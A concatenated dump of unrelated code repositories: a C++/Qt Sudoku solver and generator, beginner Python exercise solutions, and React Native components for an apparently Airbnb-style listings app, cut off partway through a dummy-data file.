476d54e43ec900c911f5cd29117345201caedddd
|
[
"Markdown",
"Python"
] | 2 |
Python
|
h1data/liveThemeParser.py
|
2f9747b3ab777859fe11384940e6ef2e20571140
|
150757fa120843ac60acda83bc65c4b45ed21ebc
|
refs/heads/master
|
<repo_name>dakesson/SudokuSolver<file_sep>/SudokuSolverGUI/Position.cpp
#include <math.h>
#include "Position.h"
Position::Position(int row, int col)
{
this->storagePos = row * NUM_COL + col;
}
Position::Position(int storagePos)
{
this->storagePos = storagePos;
}
int Position::getRow()
{
return (storagePos / NUM_ROW);
}
int Position::getCol()
{
return (storagePos % NUM_ROW);
}
int Position::getStoragePos()
{
return storagePos;
}
int Position::getBox()
{
return floor(getRow() / 3) * 3 + floor(getCol() / 3);
}
Position::~Position()
{
}<file_sep>/README.md
# SudokuSolver
- Solves sudokus through depth-first search with backtracking
- Verifies that exactly one solution exists
- Gives a very rough estimate of difficulty by counting the number of backtracks performed
- Generates new, very easy sudokus through depth-first search
- Simple UI written in Qt
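The points above boil down to one routine: a depth-first search assigns candidate digits cell by cell, undoes each assignment on a dead end (a "backtrack"), counts solutions to check uniqueness, and treats the backtrack count as a crude difficulty score. A minimal Python illustration of the idea (a sketch, not the C++ implementation in this repo):

```python
def candidates(grid, r, c):
    """Digits not yet used in row r, column c, or the enclosing 3x3 box (0 = empty)."""
    used = set(grid[r]) | {row[c] for row in grid}
    br, bc = 3 * (r // 3), 3 * (c // 3)
    used |= {grid[br + i][bc + j] for i in range(3) for j in range(3)}
    return [d for d in range(1, 10) if d not in used]

def count_solutions(grid, limit=2):
    """Return (solutions_found, backtracks), stopping once `limit` solutions are seen."""
    empties = [(r, c) for r in range(9) for c in range(9) if grid[r][c] == 0]
    stats = {"solutions": 0, "backtracks": 0}

    def solve(i):
        if stats["solutions"] >= limit:
            return  # early exit once uniqueness is decided
        if i == len(empties):
            stats["solutions"] += 1
            return
        r, c = empties[i]
        for d in candidates(grid, r, c):
            grid[r][c] = d
            solve(i + 1)
            grid[r][c] = 0  # undo the assignment: one backtrack
            stats["backtracks"] += 1

    solve(0)
    return stats["solutions"], stats["backtracks"]
```

Calling `count_solutions` with `limit=2` is enough to distinguish "unique", "unsolvable", and "ambiguous" without enumerating every solution.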
<file_sep>/SudokuSolverGUI/SudokuWindow.h
#pragma once
#include <QtWidgets>
#include "Sudoku.h"
class SudokuWindow : public QMainWindow
{
private:
Sudoku *sudoku;
QMenu *fileMenu;
QGridLayout *layout;
QVector<QLabel*> cellLabels;
const int cellSize = 40;
bool sudokuLoaded = false;
void createMenu();
void drawBoxBorders();
void drawCellLabels();
QLabel* getCellLabel(int row, int col);
public:
SudokuWindow();
void draw(Sudoku *sudoku);
void open();
void solve();
void generate();
~SudokuWindow();
};<file_sep>/SudokuSolverGUI/SudokuWindow.cpp
#include "SudokuWindow.h"
#include "Parser.h"
#include "SudokuGenerator.h"
#include "SudokuSolver.h"
SudokuWindow::SudokuWindow()
{
layout = new QGridLayout;
drawCellLabels();
drawBoxBorders();
createMenu();
QWidget * central = new QWidget();
setCentralWidget(central);
centralWidget()->setLayout(layout);
setWindowTitle("Sudoku");
setFixedSize(cellSize * NUM_COL + 15, cellSize * NUM_ROW + 30 + 10);
centralWidget()->setContentsMargins(0, 0, 10, 10);
}
void SudokuWindow::createMenu()
{
QMenuBar* menuBar = new QMenuBar();
QMenu *fileMenu = new QMenu("File");
menuBar->addMenu(fileMenu);
QAction *openAction = fileMenu->addAction("Open");
connect(openAction, &QAction::triggered, this, &SudokuWindow::open);
QAction *solveAction = fileMenu->addAction("Solve");
connect(solveAction, &QAction::triggered, this, &SudokuWindow::solve);
QAction *generateAction = fileMenu->addAction("Generate");
connect(generateAction, &QAction::triggered, this, &SudokuWindow::generate);
layout->setMenuBar(menuBar);
}
void SudokuWindow::drawBoxBorders()
{
for (int row = 0; row < 3; ++row) {
for (int col = 0; col < 3; col++) {
QLabel * const cellSquare = new QLabel();
cellSquare->setFixedSize(cellSize * 3, cellSize * 3);
layout->addWidget(cellSquare, row * 3, col * 3);
cellSquare->setStyleSheet("border: 2px solid black");
}
}
}
void SudokuWindow::drawCellLabels()
{
for (int row = 0; row < NUM_ROW; ++row) {
for (int col = 0; col < NUM_COL; col++) {
QLabel * const cellLabel = new QLabel();
cellLabel->setFixedSize(cellSize, cellSize);
layout->addWidget(cellLabel, row, col);
cellLabel->setStyleSheet("border: 1px solid grey");
cellLabel->setAlignment(Qt::AlignCenter);
cellLabels.append(cellLabel);
}
}
}
QLabel * SudokuWindow::getCellLabel(int row, int col)
{
return cellLabels[row * NUM_COL + col];
}
void SudokuWindow::draw(Sudoku *sudoku)
{
this->sudoku = sudoku;
sudokuLoaded = true;
for (int row = 0; row < NUM_ROW; row++) {
for (int col = 0; col < NUM_COL; col++) {
int value = sudoku->getValueFor(Position(row, col));
if (value) {
char asciiNumber = '0' + value;
QString cellString = QString(asciiNumber);
getCellLabel(row, col)->setText(cellString);
}
else {
getCellLabel(row, col)->setText(QString(""));
}
}
}
}
void SudokuWindow::open()
{
QString filename = QFileDialog::getOpenFileName();
QFile file(filename);
if (!file.open(QIODevice::ReadOnly | QIODevice::Text))
return;
Sudoku *sudoku = Parser::parseFile(filename.toStdString());
if (!sudoku->allConstraintsOK()) {
QMessageBox::warning(this, "Sudoku",
"This sudoku has contradicting constraints");
}
draw(sudoku);
}
void SudokuWindow::solve()
{
if (!sudokuLoaded)
return;
SudokuSolver *solver = new SudokuSolver(sudoku);
solver->findAllSolutions();
if (solver->solutions.size() == 1) {
QMessageBox::information(this, "Solved!",
QString::fromStdString(solver->difficultyOfSudoku()));
draw(&solver->solutions[0]);
} else {
QMessageBox::information(this, "Sudoku",
"This sudoku does not have a unique solution");
}
}
void SudokuWindow::generate()
{
Sudoku *sudoku = SudokuGenerator().generate();
draw(sudoku);
}
SudokuWindow::~SudokuWindow()
{
}<file_sep>/SudokuSolverGUI/Sudoku.cpp
#include "Sudoku.h"
#include "Utility.h"
Sudoku::Sudoku()
{
this->storage = std::vector<int>(NUM_ROW * NUM_COL);
}
void Sudoku::setValue(int value, Position pos)
{
storage[pos.getStoragePos()] = value;
}
void Sudoku::removeValue(Position pos)
{
    setValue(0, pos); // 0 marks an empty cell
}
int Sudoku::getValueFor(Position pos)
{
return storage[pos.getStoragePos()];
}
std::vector<int>Sudoku::getRowValues(int row)
{
std::vector<int> rowValues;
for (int col = 0; col < NUM_COL; col++)
{
int value = getValueFor(Position(row,col));
if (value)
rowValues.push_back(value);
}
return rowValues;
}
std::vector<int> Sudoku::getColValues(int col)
{
std::vector<int> colValues;
for (int row = 0; row < NUM_ROW; row++)
{
int value = getValueFor(Position(row, col));
if (value)
colValues.push_back(value);
}
return colValues;
}
std::vector<int> Sudoku::getBoxValues(int number)
{
	std::vector<int> boxValues;
	int startRow = (number / 3) * 3; // integer division, so floor()/<cmath> is unnecessary
	for (int row = startRow; row < startRow + 3; row++)
	{
		int startCol = (number % 3) * 3;
		for (int col = startCol; col < startCol + 3; col++)
		{
			int value = getValueFor(Position(row, col));
			if (value)
				boxValues.push_back(value);
		}
	}
	return boxValues;
}
bool Sudoku::allConstraintsOK()
{
for (int i = 0; i < 9; i++)
{
if (utility::containsDuplicates(getRowValues(i)))
return false;
if (utility::containsDuplicates(getColValues(i)))
return false;
if (utility::containsDuplicates(getBoxValues(i)))
return false;
}
return true;
}
bool Sudoku::constraintsForCellOK(Position pos)
{
if (utility::containsDuplicates(getRowValues(pos.getRow())))
return false;
if (utility::containsDuplicates(getColValues(pos.getCol())))
return false;
if (utility::containsDuplicates(getBoxValues(pos.getBox())))
return false;
return true;
}
std::vector<Position> Sudoku::getUnFilledPositions()
{
std::vector<Position> result;
for (int i = 0; i < storage.size(); i++) {
if (!storage[i])
result.push_back(Position(i));
}
return result;
}
std::vector<Position> Sudoku::getFilledPositions()
{
std::vector<Position> result;
for (int i = 0; i < storage.size(); i++) {
if (storage[i])
result.push_back(Position(i));
}
return result;
}
int Sudoku::computeConstraintsFor(Position pos)
{
std::vector<int> constraints;
std::vector<int> rowValues = getRowValues(pos.getRow());
constraints.insert(constraints.end(), rowValues.begin(), rowValues.end());
std::vector<int> colValues = getColValues(pos.getCol());
constraints.insert(constraints.end(), colValues.begin(), colValues.end());
std::vector<int> boxValues = getBoxValues(pos.getBox());
constraints.insert(constraints.end(), boxValues.begin(), boxValues.end());
return utility::countUniqueValues(constraints);
}
void Sudoku::clearValues()
{
storage = std::vector<int>(NUM_ROW * NUM_COL);
}
Sudoku::~Sudoku()
{
}<file_sep>/SudokuSolverGUI/Utility.h
#pragma once
#include <vector>
namespace utility
{
bool containsDuplicates(std::vector<int> vector);
int countUniqueValues(std::vector<int> v);
}<file_sep>/SudokuSolverGUI/Parser.cpp
#include "Parser.h"
#include <fstream>
#include <iostream>
#include <sstream>
#include <ctype.h>
Sudoku* Parser::parseFile(std::string filename)
{
Sudoku *sudoku = new Sudoku();
std::ifstream infile(filename);
if (!infile.is_open())
throw std::invalid_argument("Could not open file: " + filename);
std::string line;
int row = 0;
while (getline(infile, line))
{
for (std::string::size_type col = 0; col < line.size(); col++)
{
char s = line[col];
			if (isdigit((unsigned char)s) && row < NUM_ROW && col < (std::string::size_type)NUM_COL)
{
int number = s - '0';
sudoku->setValue(number, Position(row, col));
}
}
row++;
}
return sudoku;
}<file_sep>/SudokuSolverGUI/SudokuSolver.cpp
#include "SudokuSolver.h"
#include <algorithm>
SudokuSolver::SudokuSolver(Sudoku *sudoku)
{
this->sudoku = sudoku;
}
void SudokuSolver::findAllSolutions()
{
deepthFirstSearch(true);
}
void SudokuSolver::findSolution()
{
deepthFirstSearch(false);
}
void SudokuSolver::deepthFirstSearch(bool findAllSolutions)
{
std::vector<Position> unfilledPositions = sudoku->getUnFilledPositions();
int level = 0;
numberOfBacktracks = 0;
while (level < unfilledPositions.size())
{
if (level == -1)
return;
Position pos = unfilledPositions[unfilledPositions.size() - level - 1];
int nextValue = sudoku->getValueFor(pos) + 1;
if (nextValue == 10) {
sudoku->setValue(0, pos);
level--;
numberOfBacktracks++;
continue;
}
for (int testValue = nextValue; testValue < 10; testValue++) {
sudoku->setValue(testValue, pos);
if (sudoku->constraintsForCellOK(pos)) {
bool solutionFound = (level == unfilledPositions.size() - 1);
if (solutionFound) {
solutions.push_back(*sudoku);
if (!findAllSolutions) {
return;
}
} else {
level++;
break;
}
}
}
}
}
std::string SudokuSolver::difficultyOfSudoku()
{
if (numberOfBacktracks == 0) {
return "No sudoku solved";
}
else if (numberOfBacktracks < 1000) {
return "Sudoku was easy!";
}
else if (numberOfBacktracks < 15000) {
return "Sudoku was medium";
}
else if (numberOfBacktracks < 35000) {
return "Sudoku was hard";
}
else {
return "Sudoku was level SAMURAI!";
}
}
SudokuSolver::~SudokuSolver()
{
}<file_sep>/SudokuSolverGUI/SudokuSolver.h
#pragma once
#include "Sudoku.h"
#include <Windows.h>
#include <iostream>
#include <sstream>
#include <ctime>
#include <cstdio>
class SudokuSolver
{
private:
Sudoku *sudoku;
int numberOfBacktracks;
void deepthFirstSearch(bool findAllSolutions);
public:
explicit SudokuSolver(Sudoku *sudoku);
void findAllSolutions();
void findSolution();
std::vector<Sudoku> solutions;
std::string difficultyOfSudoku();
~SudokuSolver();
};<file_sep>/SudokuSolverGUI/main.cpp
#include "SudokuWindow.h"
#include <QtWidgets/QApplication>
int main(int argc, char *argv[])
{
QApplication app(argc, argv);
SudokuWindow sudokuWindow;
sudokuWindow.show();
return app.exec();
}<file_sep>/SudokuSolverGUI/Utility.cpp
#include "Utility.h"
#include <unordered_map>
namespace utility
{
bool containsDuplicates(std::vector<int> v)
{
std::unordered_map<int, bool> m;
for (std::vector<int>::iterator it = v.begin(); it != v.end(); ++it) {
int i = *it;
if (m.find(i) != m.end())
return true;
else
m[i] = true;
}
return false;
}
int countUniqueValues(std::vector<int> v)
{
std::unordered_map<int, bool> m;
for (std::vector<int>::iterator it = v.begin(); it != v.end(); ++it) {
int i = *it;
m[i] = true;
}
return m.size();
}
}<file_sep>/SudokuSolverGUI/SudokuGenerator.cpp
#include "SudokuGenerator.h"
#include "SudokuSolver.h"
#include <ctime>
SudokuGenerator::SudokuGenerator()
{
srand(time(0));
}
SudokuGenerator::~SudokuGenerator()
{
}
Sudoku* SudokuGenerator::generate()
{
Sudoku *sudoku = new Sudoku();
fillSudoku(sudoku);
removeRandomValuesUntilOneSolution(sudoku);
return sudoku;
}
void SudokuGenerator::fillSudoku(Sudoku * sudoku)
{
while (true) {
sudoku->clearValues();
addRandomInitialValuesTo(sudoku);
SudokuSolver solver = SudokuSolver(sudoku);
solver.findSolution();
if (solver.solutions.size() > 0) {
			*sudoku = solver.solutions[0]; // copy the solved grid back into the caller's object
break;
}
}
}
void SudokuGenerator::addRandomInitialValuesTo(Sudoku *sudoku)
{
for (int i = 1; i <= 9; i++) {
		int storagePos = rand() % 81; // all 81 cells (storage positions 0-80)
sudoku->setValue(i, Position(storagePos));
}
}
void SudokuGenerator::removeRandomValuesUntilOneSolution(Sudoku * sudoku)
{
std::vector<Position> removablePositions = sudoku->getFilledPositions();
	while (!removablePositions.empty()) {
		int randomRemovablePosition = rand() % removablePositions.size();
Position pos = removablePositions[randomRemovablePosition];
int oldValue = sudoku->getValueFor(pos);
sudoku->removeValue(Position(pos));
SudokuSolver solver = SudokuSolver(sudoku);
solver.findAllSolutions();
if (solver.solutions.size() == 0) {
sudoku->setValue(oldValue, pos);
}
if (solver.solutions.size() > 1) {
sudoku->setValue(oldValue, pos);
return;
}
removablePositions.erase(removablePositions.begin() + randomRemovablePosition);
}
}<file_sep>/SudokuSolverGUI/Position.h
#pragma once
const int NUM_ROW = 9;
const int NUM_COL = 9;
class Position
{
private:
int storagePos;
Position();
public:
explicit Position(int row, int col);
explicit Position(int storagePos);
int getRow();
int getCol();
int getStoragePos();
int getBox();
~Position();
};<file_sep>/SudokuSolverGUI/Parser.h
#pragma once
#include <string>
#include "Sudoku.h"
namespace Parser
{
Sudoku* parseFile(std::string filename);
};<file_sep>/SudokuSolverGUI/Sudoku.h
#pragma once
#include <vector>
#include "Position.h"
class Sudoku
{
private:
std::vector <int> storage;
std::vector<int> getRowValues(int row);
std::vector<int> getColValues(int col);
std::vector<int> getBoxValues(int number);
public:
Sudoku();
void setValue(int value, Position pos);
void removeValue(Position pos);
int getValueFor(Position pos);
bool allConstraintsOK();
bool constraintsForCellOK(Position pos);
std::vector<Position> getUnFilledPositions();
std::vector<Position> getFilledPositions();
	int computeConstraintsFor(Position pos);
	void clearValues();
~Sudoku();
};<file_sep>/SudokuSolverGUI/SudokuGenerator.h
#pragma once
#include "Sudoku.h"
class SudokuGenerator
{
private:
void addRandomInitialValuesTo(Sudoku *sudoku);
void fillSudoku(Sudoku *sudoku);
void removeRandomValuesUntilOneSolution(Sudoku *sudoku);
public:
SudokuGenerator();
~SudokuGenerator();
Sudoku* generate();
};
|
10f05fb66bb5272bbd647e11a70147b43413d1f9
|
[
"Markdown",
"C++"
] | 16 |
C++
|
dakesson/SudokuSolver
|
d554e38ed51818c44d351711218971e7cddd7927
|
2bd9ac3153fac6371601e17aeb761e1d399c7ca4
|
refs/heads/master
|
<repo_name>mpolis2/CodingNomads-PythonLabs<file_sep>/03_more_datatypes/2_lists/03_10_unique.py
'''
Write a script that creates a list of all unique values in a list. For example:
list_ = [1, 2, 6, 55, 2, 'hi', 4, 6, 1, 13]
unique_list = [55, 'hi', 4, 13]
'''
list_ = [1, 2, 6, 55, 2, 'hi', 4, 6, 1, 13]
unique_list = []
for item in list_:
    if list_.count(item) == 1:
        unique_list.append(item)
print(f"the values that appear only once are {unique_list}")<file_sep>/02_basic_datatypes/2_strings/02_09_vowel.py
'''
Write a script that prints the total number of vowels that are used in a user-inputted string.
CHALLENGE: Can you change the script so that it counts the occurrence of each individual vowel
in the string and print a count for each of them?
'''
# get user sentence
sentence = input("type a sentence: ").lower()
# define vowels
A = sentence.count("a")
E = sentence.count("e")
I = sentence.count("i")
O = sentence.count("o")
U = sentence.count("u")
print(f"there are {A} a's")
print(f"there are {E} e's")
print(f"there are {I} i's")
print(f"there are {O} o's")
print(f"there are {U} u's")
print(f"{A + E + I + O + U} vowels total")<file_sep>/02_basic_datatypes/2_strings/02_11_slicing.py
'''
Using string slicing, take in the user's name and print out their name translated to pig latin.
For the purpose of this program, we will say that any word or name can be
translated to pig latin by moving the first letter to the end, followed by "ay".
For example: ryan -> yanray, caden -> adencay
'''
#get name
name = input("type your name: ")
#get first letter
first_letter = name[0]
#remove first letter
name = name[1:]
#append first letter + 'ay' to end of word
name = name + first_letter + "ay"
print(name)
<file_sep>/03_more_datatypes/2_lists/03_11_split.py
'''
Write a script that takes in a string from the user. Using the split() method,
create a list of all the words in the string and print the word with the most
occurrences.
'''
user_string = input("type a word or short phrase: ")
as_list = user_string.split()
count_list = []
for item in as_list:
count_list.append(as_list.count(item))
print("Highest number in occurrence list: " + str(max(count_list)))
highest_occurance = (max(count_list))
'''
Find the highest count in count_list, determine its position in the list,
and then use that position as the index into the word list.
This finds the word with the most occurrences.
'''
highest_occurance_index = (count_list.index(highest_occurance))
most_frequent_word = (as_list[highest_occurance_index]) #value at index of highest occurance
print(f'the word that occurs the most is "{most_frequent_word}"')<file_sep>/04_conditionals_loops/04_04_prime.py
'''
Print out every prime number between 1 and 100.
'''
for i in range(2, 101):
    # i is prime if no number from 2 up to i - 1 divides it evenly
    is_prime = True
    for divisor in range(2, i):
        if i % divisor == 0:
            is_prime = False
            break
    if is_prime:
        print(i)
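# A hedged alternative sketch (not the lab's required loop): trial division
# only needs to test divisors up to the square root of n, which is noticeably
# faster for larger ranges.

```python
import math

def is_prime(n):
    # numbers below 2 are not prime by definition
    if n < 2:
        return False
    # a composite n must have a divisor no larger than sqrt(n)
    for d in range(2, int(math.sqrt(n)) + 1):
        if n % d == 0:
            return False
    return True

primes_to_100 = [n for n in range(1, 101) if is_prime(n)]
print(primes_to_100)
```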
<file_sep>/04_conditionals_loops/04_01_divisible.py
'''
Write a program that takes a number between 1 and 1,000,000,000
from the user and determines whether it is divisible by 3 using an if statement.
Print the result.
'''
number = int(input("type number between 1 - 1,000,000,000: "))
if number % 3 == 0:
    print(f'{number} is divisible by 3 (quotient: {number // 3})')
else:
    print(f'{number} is not divisible by 3')<file_sep>/02_basic_datatypes/1_numbers/02_06_invest.py
'''
Take in the following three values from the user:
- investment amount
- interest rate in percentage
- number of years to invest
Print the future values to the console.
'''
amount = int(input("what is the amount to invest? "))
interest = int(input("What is the interest rate (in percent)? "))
years = int(input("how many years will you invest? "))
future_value = (amount * interest/100 * years) + amount
print(f'In {years} years, your initial principal of ${amount} will be worth ${future_value}')
<file_sep>/03_more_datatypes/3_tuples/03_12_list_to_tuple.py
'''
Write a script that takes a list and turns it into a tuple.
'''
list_ = ["hi", "bye", "see you soon"]
tuple_=tuple(list_)
print(tuple_)
print(type(tuple_))<file_sep>/01_python_fundamentals/01_02_seconds_years.py
'''
Move the code you previously wrote to calculate how many seconds are in a year into this file.
Then execute it as a script to see the output printed to your console.
'''
seconds_in_year = 60 * 60 * 24 * 365
print("there are " + str(seconds_in_year) + " seconds in a year")
print(f"there are {seconds_in_year} seconds in a year")
<file_sep>/04_conditionals_loops/04_07_search.py
'''
Receive a number between 0 and 1,000,000,000 from the user.
Use while loop to find the number - when the number is found exit the loop and print the number to the console.
'''
number = int(input("type a number from 0 - 1,000,000,000: "))
i= 0
while i <= 1000000000:
if i == number:
print(f"I found your number: {number}")
break
i += 1<file_sep>/02_basic_datatypes/2_strings/02_07_replace.py
'''
Write a script that takes a string of words and a symbol from the user.
Replace all occurrences of the first letter with the symbol. For example:
String input: more python programming please
Symbol input: #
Result: #ore python progra##ing please
'''
sentence = input("type a sentence: ")
symbol = input("now type a symbol: ").strip()
first_letter = sentence[0]
print (sentence.replace(first_letter, symbol))
<file_sep>/02_basic_datatypes/1_numbers/02_05_convert.py
'''
Demonstrate how to:
1) Convert an int to a float
2) Convert a float to an int
3) Perform floor division using a float and an int.
4) Use two user inputted values to perform multiplication.
Take note of what information is lost when some conversions take place.
'''
# 1) int -> float
a = 5
b = float(a)          # 5.0
# 2) float -> int (the fractional part is lost)
c = int(7.9)          # 7
# 3) floor division using a float and an int
d = 7.0 // 2          # 3.0
print(b, c, d)
# 4) multiplication with two user-inputted values
x = input("type a number: ")
y = input("and another: ")
print(f'{x} x {y} is {int(x) * int(y)}')<file_sep>/02_basic_datatypes/2_strings/02_08_occurrence.py
'''
Write a script that takes a string of words and a letter from the user.
Find the index of first occurrence of the letter in the string. For example:
String input: hello world
Letter input: o
Result: 4
'''
sentence = input("type a short sentence: ")
letter = input("now type a single character to locate: ").strip()
print("result")
print(f'the first instance of "{letter}" is located at index[{sentence.find(letter)}]')<file_sep>/02_basic_datatypes/1_numbers/02_01_cylinder.py
'''
Write the necessary code calculate the volume and surface area
of a cylinder with a radius of 3.14 and a height of 5. Print out the result.
'''
# V = π·r²·h
# volume = pi * radius squared * height
radius = 3.14
height = 5
pi = 3.14
volume = pi * radius ** 2 * height
print (f'volume = {volume}')
#surface area
# A = 2·π·r·h + 2·π·r²
# area = (2 * pi * radius * height) + (2 * pi * radius squared)
area = (2 * pi * radius * height) + (2 * pi * radius ** 2)
print (f'area = {area}')<file_sep>/04_conditionals_loops/04_05_sum.py
'''
Take two numbers from the user, one representing the start and one the end of a sequence.
Using a loop, sum all numbers from the first number through to the second number.
For example, if a user enters 1 and 100, the sequence would be all integer numbers from 1 to 100.
The output of your calculation should therefore look like this:
The sum is: 5050
'''
print("type the start and end of the range")
start = int(input("start: "))
end = int(input("end: "))
total = 0
for i in range (start, end + 1):
total += i
print(f'the total is {total}')
<file_sep>/03_more_datatypes/2_lists/03_06_product_largest.py
'''
Take in 10 numbers from the user. Place the numbers in a list.
Find the largest number in the list.
Print the results.
CHALLENGE: Calculate the product of all of the numbers in the list.
(you will need to use "looping" - a concept common to list operations
that we haven't looked at yet. See if you can figure it out, otherwise
come back to this task after you have learned about loops)
'''
mult_total = 1
numbers = []
for i in range (10):
new_num = int(input("type in a number: "))
numbers.append(new_num)
mult_total *= new_num #running total multiplying each new number
print(f'the largest number is {sorted(numbers)[-1]}')
print(f'multiplying all numbers = {mult_total}')<file_sep>/02_basic_datatypes/1_numbers/02_03_runner.py
'''
If a runner runs 10 miles in 30 minutes and 30 seconds,
What is his/her average speed in kilometers per hour? (Tip: 1 mile = 1.6 km)
'''
# convert distance to km and time to hours, then divide
distance_km = 10 * 1.6                 # 1 mile = 1.6 km
time_hours = (30 * 60 + 30) / 3600     # 30 min 30 s expressed in hours
speed_km = distance_km / time_hours
print(f'average speed is {speed_km:.2f} km/hour')<file_sep>/02_basic_datatypes/2_strings/02_10_most_characters.py
'''
Write a script that takes three strings from the user and prints them together with their length.
Example Output:
5, hello
5, world
9, greetings
CHALLENGE: Can you edit to script to print only the string with the most characters? You can look
into the topic "Conditionals" to solve this challenge.
'''
#get user words
word_1 = input("Type a word: ")
word_2 = input("Type a 2nd word: ")
word_3 = input("Type a 3rd word: ")
#print words, each with length
print(str(len(word_1)), word_1)
print(str(len(word_2)), word_2)
print(str(len(word_3)), word_3)<file_sep>/04_conditionals_loops/04_02_month.py
'''
Take in a number from the user and print "January", "February", ...
"December", or "Other" if the number from the user is 1, 2,... 12,
or other respectively. Use a "nested-if" statement.
'''
months = ["January", "February", "March", "April", "May", "June", "July", "August",
"September", "October", "November", "December"]
number = int(input("type a number: "))
if 1 <= number <= 12:
    print(months[number - 1])
else:
    print("Other")
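# A hedged alternative sketch using the standard library: calendar.month_name
# maps 1..12 directly to month names (index 0 is an empty string).

```python
import calendar

def month_name(n):
    # valid month numbers index straight into calendar.month_name
    if 1 <= n <= 12:
        return calendar.month_name[n]
    return "Other"

print(month_name(3))
```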
<file_sep>/03_more_datatypes/3_tuples/03_13_tuple_to_list.py
'''
Write a script that takes a tuple and turns it into a list.
'''
tuple_ = (2, 3, 4, 5)
# method 1 - loop & append
# list_ = []
# for item in tuple_:
#     list_.append(item)
# method 2 - explicit type conversion
list_ = list(tuple_)
print(list_)
print(type(list_))
|
4cb74ba21fe8a5a44d362c1e3a163d389c967148
|
[
"Python"
] | 20 |
Python
|
mpolis2/CodingNomads-PythonLabs
|
2efbfd2a03592ebaeb1b20c42dbd7b1ae75fc640
|
14a0503db2e3cb7f605bf3c87f021ab84cd92317
|
refs/heads/master
|
<repo_name>tzq668766/rest-client<file_sep>/mac-run-ui.sh
#!/bin/sh
VERSION=`head pom.xml | grep 'version.*version' | sed -E 's/.*version.(.*)..version.*/\1/g'`
java -Dorg.apache.commons.logging.Log=org.apache.commons.logging.impl.SimpleLog -Dorg.apache.commons.logging.simplelog.log.org.apache.http.wire=DEBUG -Dapple.laf.useScreenMenuBar=true -Dapple.awt.application.name=RESTClient -jar restclient-ui/target/restclient-ui-$VERSION-jar-with-dependencies.jar
|
7d272f906662034f51eebea9ae07b0ec8d78ca7e
|
[
"Shell"
] | 1 |
Shell
|
tzq668766/rest-client
|
14a5ea43ba083d6759fbb37835e8ce8d2a91f0f0
|
ccc0b6bb1a861f1070c831cf2faa6dcd2a4b49e5
|
refs/heads/master
|
<file_sep>import { Dimensions, StyleSheet } from "react-native";
const styles = StyleSheet.create({
container : {
height: '100%',
justifyContent: "space-between"
},
row:{
flexDirection: 'row',
alignItems: 'center',
justifyContent: 'space-between',
paddingVertical: 20,
borderBottomWidth: .5,
borderBottomColor: '#cccccc',
marginHorizontal:20
},
title:{
},
buttons: {
flexDirection: 'row',
color: 'red',
alignItems: 'center'
},
number:{
marginHorizontal: 20,
},
buttonText:{
fontSize: 30
},
numButton: {
borderWidth: 1,
width: 30,
height: 30,
justifyContent: "center",
alignItems: 'center',
borderRadius: 15,
borderColor: '#b8b8b8'
},
searchButton:{
backgroundColor: '#f15454',
width: Dimensions.get('window').width -20,
paddingVertical: 20,
marginBottom: 10,
marginHorizontal: 10,
borderRadius: 10,
alignItems: 'center'
},
searchButtonText: {
color: 'white',
fontWeight: '700',
fontSize: 20
}
})
export default styles;
<file_sep>import React from 'react'
import { View, Text, Image,Pressable } from 'react-native'
import styles from './styles.js'
import { useNavigation } from '@react-navigation/native'
const Accommodation = (props) => {
const days = 3
const post = props.post
const navigator = useNavigation()
return (
<Pressable
style={styles.container}
onPress={() => {
navigator.navigate("Accommodation Details", {postId : post.id})
}}
>
{/* Image */}
<Image
source={{uri: post.image}}
style={styles.image}
/>
{/* Bed and Bedroom */}
<Text style={styles.bed}>{post.bed} Bed {post.bedroom} Bedroom</Text>
{/* Description */}
<Text style={styles.description} numberOfLines={3}>
<Text style={styles.room}>{post.type} </Text>
{post.title}
</Text>
{/* Old Price and New Price */}
<Text style={styles.price}>
<Text style={styles.oldPrice}>${post.oldPrice}</Text>
<Text style={styles.newPrice}> ${post.newPrice}</Text>
/ Night
</Text>
{/* Total Price */}
<Text style={styles.totalPrice}>${post.newPrice * days} total</Text>
</Pressable>
)
}
export default Accommodation
<file_sep>import React from 'react'
import {createMaterialTopTabNavigator} from '@react-navigation/material-top-tabs'
import SearchResultScreen from '../screens/SearchResult'
import MapScreen from '../screens/Map';
import { useRoute } from '@react-navigation/native'
const SearchResultsTabNavigator = () => {
const route = useRoute()
const Tab = createMaterialTopTabNavigator()
return (
<Tab.Navigator tabBarOptions={{
activeTintColor: '#f15454',
indicatorStyle:{
backgroundColor: '#f15454'
}
}}>
<Tab.Screen name={'list'}>
{() => <SearchResultScreen guests={route.params.guests}/>}
</Tab.Screen>
<Tab.Screen name={'map'}>
{() => <MapScreen guests={route.params.guests}/>}
</Tab.Screen>
</Tab.Navigator>
)
}
export default SearchResultsTabNavigator;
<file_sep>import API from '@aws-amplify/api'
import { graphqlOperation } from '@aws-amplify/api-graphql'
import React, { useEffect, useState } from 'react'
import { View, FlatList } from 'react-native'
import Accommodation from '../../components/Accommodation'
import {listPosts} from '../../graphql/queries'
const SearchResultScreen = (props) => {
const {guests} = props
const [post, setPost] = useState([])
const fetchPosts = async () =>{
const posts = await API.graphql(
graphqlOperation(listPosts, {
filter:{
maxGuests: {
ge: guests
}
}
})
)
return posts
}
useEffect(() =>{
fetchPosts()
.then(posts => setPost(posts.data.listPosts.items))
.catch(e => console.log(e))
},[])
return (
<View>
<FlatList
data={post}
renderItem={({item}) => <Accommodation post={item} /> }
showsVerticalScrollIndicator={false}
/>
</View>
)
}
export default SearchResultScreen;
<file_sep>import {StyleSheet} from 'react-native'
const styles = StyleSheet.create({
container : {
margin : 10,
marginVertical: 20
},
image : {
width: '100%',
aspectRatio: 3 / 2,
borderRadius : 10
},
bed : {
paddingTop: 10,
color : '#CDCDCD',
fontSize: 14,
fontWeight: '700'
},
description : {
fontSize: 18,
textAlign: 'justify',
lineHeight: 24
},
room : {
fontWeight: '700'
},
price : {
fontSize: 18,
marginTop: 4
},
oldPrice : {
color: '#5b5b5b',
fontWeight: '700',
textDecorationLine: 'line-through'
},
newPrice :{
fontWeight: '700'
},
totalPrice : {
fontSize: 14,
color: '#5b5b5b',
textDecorationLine: 'underline',
marginTop: 4
},
longDescription :{
marginTop: 10,
textAlign: 'justify',
lineHeight: 20,
fontSize: 16
}
})
export default styles;
<file_sep>export default [
{
id: '0',
image: 'https://notjustdev-dummy.s3.us-east-2.amazonaws.com/images/1.jpg',
type: 'Private Room',
title: 'Bright room in the heart of the city',
bed: 2,
bedroom: 3,
oldPrice: 25,
newPrice: 20,
totalPrice: 120,
coordinate: {
latitude: 28.3915637,
longitude: -16.6291304,
},
